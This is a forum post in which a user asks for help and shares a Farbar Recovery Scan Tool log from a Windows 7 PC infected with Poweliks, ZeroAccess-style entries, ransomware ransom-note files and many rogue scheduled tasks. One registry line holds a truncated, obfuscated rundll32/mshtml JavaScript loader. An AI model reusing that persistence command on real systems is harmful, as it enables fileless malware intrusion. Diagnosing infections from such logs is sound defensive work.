
dllhost32 keeps running with javascript RunHtmlApplication


aagah


Here is my FRST.log

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-09-2014
Ran by smotamedy (administrator) on SMOTAMDEY on 27-09-2014 17:56:48
Running from F:\
Loaded Profile: smotamedy (Available profiles: admin & smotamedy)
Platform: Microsoft Windows 7 Professional  (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(Cisco WebEx LLC) C:\Windows\System32\atashost.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(Lenovo) C:\Program Files\ThinkPad\Utilities\PWMDBSVC.exe
() C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
(Ulead Systems, Inc.) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(LITEON) C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\skdh8821.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Intuit Inc.) C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Microsoft Corp.) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
Winlogon\Notify\vvubjer: C:\Users\SMOTAM~1\AppData\Local\Temp\yhO0a9p3PC3iH3FRVaL\AppData\Local\vvubjer.dll [X]
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3883856 2009-07-26] (Microsoft Corporation)
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Policies\Explorer: [Run] "C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe"
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\MountPoints2: {cb82d864-b72f-11df-aa94-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-499009960-272174587-744029597-1146\...409d6c4515e9\InprocServer32: [Default-shell32] C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51\n. ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-499009960-272174587-744029597-1146\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil10n_ActiveX.exe -update activex
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
Startup: C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esentutl.lnk
ShortcutTarget: esentutl.lnk -> C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkcentre
SearchScopes: HKCU - DefaultScope {CAB6444A-D968-40CC-8D3D-32F912B73043} URL = 
SearchScopes: HKCU - {CAB6444A-D968-40CC-8D3D-32F912B73043} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll (Microsoft Corp.)
BHO: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKCU - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll ()
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 atashost; C:\Windows\system32\atashost.exe [43912 2010-11-23] (Cisco WebEx LLC)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
S4 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-11-08] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2011-08-19] (Intuit Inc.) [File not signed]
S4 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2011-08-19] (Intuit Inc.) [File not signed]
R2 Sks8821; C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe [125952 2010-05-04] () [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
R2 SUService; c:\Program Files\Lenovo\System Update\SUService.exe [28672 2010-03-15] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [1474560 2009-09-03] (Lenovo Group Limited) [File not signed]
R2 UleadBurningHelper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed]
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AcpiPmi; C:\Windows\system32\DRIVERS\acpipmi.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 aliide; C:\Windows\system32\DRIVERS\aliide.sys [40448 2009-07-13] (Acer Laboratories Inc.) [File not signed]
S3 amdide; C:\Windows\system32\DRIVERS\amdide.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 BrFiltLo; C:\Windows\system32\DRIVERS\BrFiltLo.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]
S3 BrFiltUp; C:\Windows\system32\DRIVERS\BrFiltUp.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]
S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BthEnum; C:\Windows\System32\DRIVERS\BthEnum.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 circlass; C:\Windows\system32\DRIVERS\circlass.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CmBatt; C:\Windows\system32\DRIVERS\CmBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 cmdide; C:\Windows\system32\DRIVERS\cmdide.sys [40448 2009-07-13] (CMD Technology, Inc.) [File not signed]
S4 crcdisk; C:\Windows\system32\DRIVERS\crcdisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ErrDev; C:\Windows\system32\DRIVERS\errdev.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
S3 fdc; C:\Windows\system32\DRIVERS\fdc.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 flpydisk; C:\Windows\system32\DRIVERS\flpydisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [40448 2009-07-13] (Hauppauge Computer Works, Inc.) [File not signed]
S3 HidBatt; C:\Windows\system32\DRIVERS\HidBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidIr; C:\Windows\system32\DRIVERS\hidir.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-27] (Malwarebytes Corporation)
S3 megasas; C:\Windows\system32\DRIVERS\megasas.sys [40448 2009-07-13] (LSI Corporation) [File not signed]
R0 vdorctrl; C:\Windows\System32\DRIVERS\vdorctrl.sys [44544 2009-07-13] () [File not signed]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-27 17:56 - 2014-09-27 17:56 - 00000000 ____D () C:\FRST
2014-09-27 16:48 - 2014-09-27 16:48 - 00002246 _____ () C:\Users\smotamedy\Desktop\SpyHunter.lnk
2014-09-27 16:48 - 2014-09-27 16:48 - 00000106 _____ () C:\spyhunter.fix
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\sh4ldr
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-09-27 16:48 - 2013-10-18 15:01 - 00285747 _____ () C:\shldr
2014-09-27 16:48 - 2013-10-18 15:01 - 00008192 _____ () C:\shldr.mbr
2014-09-27 16:47 - 2014-09-27 16:48 - 00000000 ____D () C:\Windows\455F074C814E4520B69B5584BD90400C.TMP
2014-09-27 16:47 - 2014-09-27 16:47 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-09-27 14:39 - 2014-09-27 14:53 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-27 14:38 - 2014-09-27 14:49 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-27 14:38 - 2014-09-27 14:38 - 00001056 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-27 14:38 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-27 14:38 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-27 14:38 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-25 11:57 - 2014-09-25 11:31 - 00244136 _____ () C:\Users\smotamedy\Downloads\Firefox Setup Stub 32.0.3.exe
2014-09-08 11:41 - 2014-09-27 14:58 - 00017470 _____ () C:\Windows\PFRO.log
2014-09-08 10:16 - 2014-09-08 10:16 - 00000000 ____D () C:\Windows\system32\%SystemDrive%
2014-09-07 03:09 - 2014-09-26 13:09 - 00073512 _____ () C:\feeddl.dat
2014-09-07 02:57 - 2014-09-08 12:41 - 00054156 ____H () C:\Windows\QTFont.qfn
2014-09-07 02:57 - 2014-09-07 02:57 - 00001409 _____ () C:\Windows\QTFont.for
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\DECRYPT_INSTRUCTION.URL
2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.URL
2014-09-07 01:23 - 2014-09-07 01:23 - 00008174 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:23 - 2014-09-07 01:23 - 00004132 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:23 - 2014-09-07 01:23 - 00000254 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-09-07 01:05 - 2014-09-27 17:05 - 00000354 _____ () C:\Windows\Tasks\At84.job
2014-09-07 01:05 - 2014-09-27 17:05 - 00000352 _____ () C:\Windows\Tasks\At83.job
2014-09-07 01:05 - 2014-09-27 16:05 - 00000354 _____ () C:\Windows\Tasks\At82.job
2014-09-07 01:05 - 2014-09-27 16:05 - 00000352 _____ () C:\Windows\Tasks\At81.job
2014-09-07 01:05 - 2014-09-27 15:05 - 00000354 _____ () C:\Windows\Tasks\At80.job
2014-09-07 01:05 - 2014-09-27 15:05 - 00000352 _____ () C:\Windows\Tasks\At79.job
2014-09-07 01:05 - 2014-09-27 14:05 - 00000354 _____ () C:\Windows\Tasks\At78.job
2014-09-07 01:05 - 2014-09-27 14:05 - 00000352 _____ () C:\Windows\Tasks\At77.job
2014-09-07 01:05 - 2014-09-27 13:05 - 00000354 _____ () C:\Windows\Tasks\At76.job
2014-09-07 01:05 - 2014-09-27 13:05 - 00000352 _____ () C:\Windows\Tasks\At75.job
2014-09-07 01:05 - 2014-09-25 23:05 - 00000354 _____ () C:\Windows\Tasks\At96.job
2014-09-07 01:05 - 2014-09-25 23:05 - 00000352 _____ () C:\Windows\Tasks\At95.job
2014-09-07 01:05 - 2014-09-25 22:09 - 00000352 _____ () C:\Windows\Tasks\At93.job
2014-09-07 01:05 - 2014-09-25 22:05 - 00000354 _____ () C:\Windows\Tasks\At94.job
2014-09-07 01:05 - 2014-09-25 21:05 - 00000354 _____ () C:\Windows\Tasks\At92.job
2014-09-07 01:05 - 2014-09-25 21:05 - 00000352 _____ () C:\Windows\Tasks\At91.job
2014-09-07 01:05 - 2014-09-25 20:06 - 00000352 _____ () C:\Windows\Tasks\At89.job
2014-09-07 01:05 - 2014-09-25 20:05 - 00000354 _____ () C:\Windows\Tasks\At90.job
2014-09-07 01:05 - 2014-09-24 19:06 - 00000352 _____ () C:\Windows\Tasks\At87.job
2014-09-07 01:05 - 2014-09-24 19:05 - 00000354 _____ () C:\Windows\Tasks\At88.job
2014-09-07 01:05 - 2014-09-24 18:05 - 00000354 _____ () C:\Windows\Tasks\At86.job
2014-09-07 01:05 - 2014-09-24 18:05 - 00000352 _____ () C:\Windows\Tasks\At85.job
2014-09-07 01:04 - 2014-09-26 12:08 - 00000352 _____ () C:\Windows\Tasks\At73.job
2014-09-07 01:04 - 2014-09-26 12:05 - 00000354 _____ () C:\Windows\Tasks\At74.job
2014-09-07 01:04 - 2014-09-26 11:05 - 00000354 _____ () C:\Windows\Tasks\At72.job
2014-09-07 01:04 - 2014-09-26 11:05 - 00000352 _____ () C:\Windows\Tasks\At71.job
2014-09-07 01:04 - 2014-09-26 10:07 - 00000352 _____ () C:\Windows\Tasks\At69.job
2014-09-07 01:04 - 2014-09-26 10:05 - 00000354 _____ () C:\Windows\Tasks\At70.job
2014-09-07 01:04 - 2014-09-26 09:05 - 00000354 _____ () C:\Windows\Tasks\At68.job
2014-09-07 01:04 - 2014-09-26 09:05 - 00000352 _____ () C:\Windows\Tasks\At67.job
2014-09-07 01:04 - 2014-09-26 08:06 - 00000352 _____ () C:\Windows\Tasks\At65.job
2014-09-07 01:04 - 2014-09-26 08:05 - 00000354 _____ () C:\Windows\Tasks\At66.job
2014-09-07 01:04 - 2014-09-26 07:07 - 00000352 _____ () C:\Windows\Tasks\At63.job
2014-09-07 01:04 - 2014-09-26 07:05 - 00000354 _____ () C:\Windows\Tasks\At64.job
2014-09-07 01:04 - 2014-09-26 06:05 - 00000354 _____ () C:\Windows\Tasks\At62.job
2014-09-07 01:04 - 2014-09-26 06:05 - 00000352 _____ () C:\Windows\Tasks\At61.job
2014-09-07 01:04 - 2014-09-26 05:05 - 00000354 _____ () C:\Windows\Tasks\At60.job
2014-09-07 01:04 - 2014-09-26 05:05 - 00000352 _____ () C:\Windows\Tasks\At59.job
2014-09-07 01:04 - 2014-09-26 04:05 - 00000354 _____ () C:\Windows\Tasks\At58.job
2014-09-07 01:04 - 2014-09-26 04:05 - 00000352 _____ () C:\Windows\Tasks\At57.job
2014-09-07 01:04 - 2014-09-26 03:05 - 00000354 _____ () C:\Windows\Tasks\At56.job
2014-09-07 01:04 - 2014-09-26 03:05 - 00000352 _____ () C:\Windows\Tasks\At55.job
2014-09-07 01:04 - 2014-09-26 02:05 - 00000354 _____ () C:\Windows\Tasks\At54.job
2014-09-07 01:04 - 2014-09-26 02:05 - 00000352 _____ () C:\Windows\Tasks\At53.job
2014-09-07 01:04 - 2014-09-26 01:05 - 00000354 _____ () C:\Windows\Tasks\At52.job
2014-09-07 01:04 - 2014-09-26 01:05 - 00000352 _____ () C:\Windows\Tasks\At51.job
2014-09-07 01:04 - 2014-09-26 00:05 - 00000354 _____ () C:\Windows\Tasks\At50.job
2014-09-07 01:04 - 2014-09-26 00:05 - 00000352 _____ () C:\Windows\Tasks\At49.job
2014-09-07 00:45 - 2014-09-08 20:53 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Awesdoop
2014-09-07 00:44 - 2014-09-08 22:34 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Zovoheap
2014-09-07 00:42 - 2014-09-27 14:49 - 00000000 ____D () C:\ProgramData\AfufGasor
2014-09-07 00:24 - 2014-09-27 13:05 - 00000112 _____ () C:\ProgramData\bw5EWA37M.dat
2014-09-07 00:23 - 2014-09-27 17:05 - 00000348 _____ () C:\Windows\Tasks\At36.job
2014-09-07 00:23 - 2014-09-27 17:05 - 00000346 _____ () C:\Windows\Tasks\At35.job
2014-09-07 00:23 - 2014-09-25 23:05 - 00000348 _____ () C:\Windows\Tasks\At48.job
2014-09-07 00:23 - 2014-09-25 23:05 - 00000346 _____ () C:\Windows\Tasks\At47.job
2014-09-07 00:23 - 2014-09-25 22:05 - 00000348 _____ () C:\Windows\Tasks\At46.job
2014-09-07 00:23 - 2014-09-25 22:05 - 00000346 _____ () C:\Windows\Tasks\At45.job
2014-09-07 00:23 - 2014-09-25 21:05 - 00000348 _____ () C:\Windows\Tasks\At44.job
2014-09-07 00:23 - 2014-09-25 21:05 - 00000346 _____ () C:\Windows\Tasks\At43.job
2014-09-07 00:23 - 2014-09-25 20:09 - 00000346 _____ () C:\Windows\Tasks\At41.job
2014-09-07 00:23 - 2014-09-25 20:05 - 00000348 _____ () C:\Windows\Tasks\At42.job
2014-09-07 00:23 - 2014-09-24 19:05 - 00000348 _____ () C:\Windows\Tasks\At40.job
2014-09-07 00:23 - 2014-09-24 19:05 - 00000346 _____ () C:\Windows\Tasks\At39.job
2014-09-07 00:23 - 2014-09-24 18:06 - 00000346 _____ () C:\Windows\Tasks\At37.job
2014-09-07 00:23 - 2014-09-24 18:05 - 00000348 _____ () C:\Windows\Tasks\At38.job
2014-09-07 00:22 - 2014-09-27 16:49 - 00000346 _____ () C:\Windows\Tasks\At33.job
2014-09-07 00:22 - 2014-09-27 16:05 - 00000348 _____ () C:\Windows\Tasks\At34.job
2014-09-07 00:22 - 2014-09-27 15:05 - 00000348 _____ () C:\Windows\Tasks\At32.job
2014-09-07 00:22 - 2014-09-27 15:05 - 00000346 _____ () C:\Windows\Tasks\At31.job
2014-09-07 00:22 - 2014-09-27 14:49 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymyqbyg
2014-09-07 00:22 - 2014-09-27 14:05 - 00000348 _____ () C:\Windows\Tasks\At30.job
2014-09-07 00:22 - 2014-09-27 14:05 - 00000346 _____ () C:\Windows\Tasks\At29.job
2014-09-07 00:22 - 2014-09-27 13:05 - 00000348 _____ () C:\Windows\Tasks\At28.job
2014-09-07 00:22 - 2014-09-27 13:05 - 00000346 _____ () C:\Windows\Tasks\At27.job
2014-09-07 00:22 - 2014-09-26 12:06 - 00000346 _____ () C:\Windows\Tasks\At25.job
2014-09-07 00:22 - 2014-09-26 12:05 - 00000348 _____ () C:\Windows\Tasks\At26.job
2014-09-07 00:22 - 2014-09-26 11:07 - 00000346 _____ () C:\Windows\Tasks\At23.job
2014-09-07 00:22 - 2014-09-26 11:05 - 00000348 _____ () C:\Windows\Tasks\At24.job
2014-09-07 00:22 - 2014-09-26 10:05 - 00000348 _____ () C:\Windows\Tasks\At22.job
2014-09-07 00:22 - 2014-09-26 10:05 - 00000346 _____ () C:\Windows\Tasks\At21.job
2014-09-07 00:22 - 2014-09-26 09:05 - 00000348 _____ () C:\Windows\Tasks\At20.job
2014-09-07 00:22 - 2014-09-26 09:05 - 00000346 _____ () C:\Windows\Tasks\At19.job
2014-09-07 00:22 - 2014-09-26 08:08 - 00000346 _____ () C:\Windows\Tasks\At17.job
2014-09-07 00:22 - 2014-09-26 08:05 - 00000348 _____ () C:\Windows\Tasks\At18.job
2014-09-07 00:22 - 2014-09-26 07:05 - 00000348 _____ () C:\Windows\Tasks\At16.job
2014-09-07 00:22 - 2014-09-26 07:05 - 00000346 _____ () C:\Windows\Tasks\At15.job
2014-09-07 00:21 - 2014-09-26 06:05 - 00000348 _____ () C:\Windows\Tasks\At14.job
2014-09-07 00:21 - 2014-09-26 06:05 - 00000346 _____ () C:\Windows\Tasks\At13.job
2014-09-07 00:21 - 2014-09-26 05:05 - 00000348 _____ () C:\Windows\Tasks\At12.job
2014-09-07 00:21 - 2014-09-26 05:05 - 00000346 _____ () C:\Windows\Tasks\At11.job
2014-09-07 00:21 - 2014-09-26 04:05 - 00000348 _____ () C:\Windows\Tasks\At10.job
2014-09-07 00:21 - 2014-09-26 04:05 - 00000346 _____ () C:\Windows\Tasks\At9.job
2014-09-07 00:21 - 2014-09-26 03:06 - 00000346 _____ () C:\Windows\Tasks\At7.job
2014-09-07 00:21 - 2014-09-26 03:05 - 00000348 _____ () C:\Windows\Tasks\At8.job
2014-09-07 00:21 - 2014-09-26 02:05 - 00000348 _____ () C:\Windows\Tasks\At6.job
2014-09-07 00:21 - 2014-09-26 02:05 - 00000346 _____ () C:\Windows\Tasks\At5.job
2014-09-07 00:21 - 2014-09-26 01:05 - 00000348 _____ () C:\Windows\Tasks\At4.job
2014-09-07 00:21 - 2014-09-26 01:05 - 00000346 _____ () C:\Windows\Tasks\At3.job
2014-09-07 00:21 - 2014-09-26 00:05 - 00000348 _____ () C:\Windows\Tasks\At2.job
2014-09-07 00:21 - 2014-09-26 00:05 - 00000346 _____ () C:\Windows\Tasks\At1.job
